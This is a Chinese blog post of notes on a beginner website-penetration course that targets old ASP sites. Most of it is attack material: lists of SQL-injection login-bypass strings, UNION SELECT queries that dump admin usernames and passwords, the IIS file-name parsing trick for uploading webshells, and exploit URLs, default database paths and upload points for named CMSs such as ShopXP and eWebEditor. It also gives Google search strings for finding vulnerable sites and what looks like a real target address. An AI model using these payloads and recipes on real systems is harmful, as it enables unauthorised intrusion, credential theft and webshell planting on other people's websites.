玄风小组渗透笔记

(入门级别的课程,看看,写了点儿笔记)

XX渗透小组教程

1、啊D,明小子
思路: 找注入点,检测表段,检测字段,检测内容,找后台

2、webshell的介绍
asp大马

3、数据库备份拿webshell
上传大马(图片格式)
备份为asa、asp格式

4、webshell的注意点
大马格式的更改
asp
asa
cdx
cer

5、手工注入
and 1=1
and 1=2

6、菜刀的使用教程

7、万能密码
asp aspx万能密码
1:'or'='or'
2:'.).or.('.a.'='.a 
3:or 1=1--
4:'or 1=1--
5:a'or' 1=1--
6:"or 1=1--
7:'or.'a.'='a
8:"or"="a'='a
9:'or''='
10:"or "a"="a



admin'or 1=1#

PHP万能密码
admin'/*
密码*/'


'or 1=1/*

"or "a"="a
"or 1=1--
"or"="
"or"="a'='a
"or1=1--
"or=or"
''or'='or'
') or ('a'='a
'.).or.('.a.'='.a
'or 1=1
'or 1=1--
'or 1=1/*
'or"="a'='a
'or' '1'='1'
'or''='
'or''=''or''='
'or'='1'
'or'='or'
'or.'a.'='a
'or1=1--
1'or'1'='1
a'or' 1=1--
a'or'1=1--
or 'a'='a'
or 1=1--
or1=1--

8、旁注的讲解
思路:找到一台主机下面的其他网站,先渗透一个,再入侵其他站点
上传文件
a.asp;1.jpg  // iis的解析漏洞


9 动感上传漏洞
谷歌搜索inurl:shopxp_news.asp?id=87
http://www.trhm163.com/shopxp_news.asp?id=87

shopxp漏洞利用代码:

爆库:TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin

后台admin/login.asp

上传点upfilepic_get.asp?formname=myform&editname=upfilepic&uppath=img_shopxp/upfilepic&filelx=jpg


利用动感购物上传漏洞, 进行拿webshell


10 图片上传拿shell
(一个教育系统的上传漏洞)
谷歌:高校现代教学管理系统
/ftb.imagegallery.aspx
/images/xfbm.asp;xfbm.jpg
xfbm.asp;xfbm.jpg

11 提权拿服务器
php网站,直接上传cmd,执行命令

12 审查元素
直接更改value=asp  再上传

13 爆破账号密码
判断字段长度
order by 10
union select 1,2,3,4,5,6,7,8,9,10 from admin
union select 1,username,password,4,5,6,7,8,9,10 from admin

14 IP代理
花刺代理验证

15 ewebeditor 编辑器 拿webshell
下载数据库
/ewebeditor/db/ewebeditor.mdb

登录后台
/ewebeditor/admin/login.asp
/ewebeditor/admin_login.asp

样式管理
\eWebEditor\Admin_Style.asp

新建样式

图片类型中加入asp
显示路径删除
设置此样式的工具栏
新增工具栏
按钮设置
添加上传图片的按钮
样式预览
上传自己的asp大马

southidceditor编辑器一般以ewebeditor v2.8.0版内核修改
可以利用的链接
/southidceditor/datas/southidceditor.mdb
/southidceditor/admin/admin_login.asp
/southidceditor/popup.asp
/southidceditor/login.asp
/Southidceditor/admin_style.asp?action=copy&id=14
/SouthidcEditor/Admin_Style.asp?action=styleset&id=47
/admin/Southidceditor/ewebeditor.asp?id=57&style=southidc

17 简单上传漏洞的利用
首先到IE里面改一下配置--然后找到活动脚本选择禁用--然后全部确定
关键词:inurl:xxhs.asp?classid=   
上传地址:admin_manage/upfile1.asp
上传后得到的马地址:admin_manage/image/201354125012.asp


18 Fyblogs网站管理系统漏洞
谷歌:inurl:type.asp?id=1 新闻中心
或者 :inurl:download_ok.asp?

万能密码:'or'='or'




一个小孩做的课程,没什么实战价值,  全部为asp的渗透, 回想起以前看这种教程的日子, 2小时看了一下, 打发下时间!!



原文链接: 玄风小组渗透笔记 版权所有,转载时请注明出处,违者必究。
注明出处格式:流沙团 ( https://gyarmy.com/post-247.html )

发表评论

0则评论给“玄风小组渗透笔记”